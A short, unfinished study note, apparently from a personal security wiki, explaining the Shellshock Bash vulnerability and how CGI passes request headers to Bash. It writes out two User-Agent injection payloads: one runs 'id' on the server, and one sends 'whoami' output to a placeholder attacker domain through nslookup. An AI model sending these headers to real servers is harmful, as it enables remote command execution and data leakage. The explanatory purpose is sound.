CVE - Shellshock (WIP)

Is a critical vulnerability now reported as CVE-2014-6271 found in the Bash shell, which allows an attacker to execute arbitrary commands by injecting specially crafted environment variables. This affects applications and services that pass external input to Bash, such as CGI scripts in web servers.

CGI (Common Gateway Interface) is a standard protocol that defines how web servers communicate with external programs to generate dynamic content. The web server passes input, normally on requests, to a CGI script using environment variables and stdin, then the web server executes that script and sends the output back to the client as a web response.

Here we find how this could be exploited:

We detected that the values of headers like User-Agent or Referer are passed to an internal GCI

# We could craft a payload to generate an RCE in a bash  
User-Agent: u() { :; }; echo; echo; /bin/bash -c 'id'

# If successful, the command will be executed. Sometimes we will see the result in the response, but in other cases we have to adopt blind techniques

# We could use this to play with a domain we control
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).<OurDomain>

PreviousCVE - Log4Shell (WIP)NextRelated Concepts

Last updated 5 months ago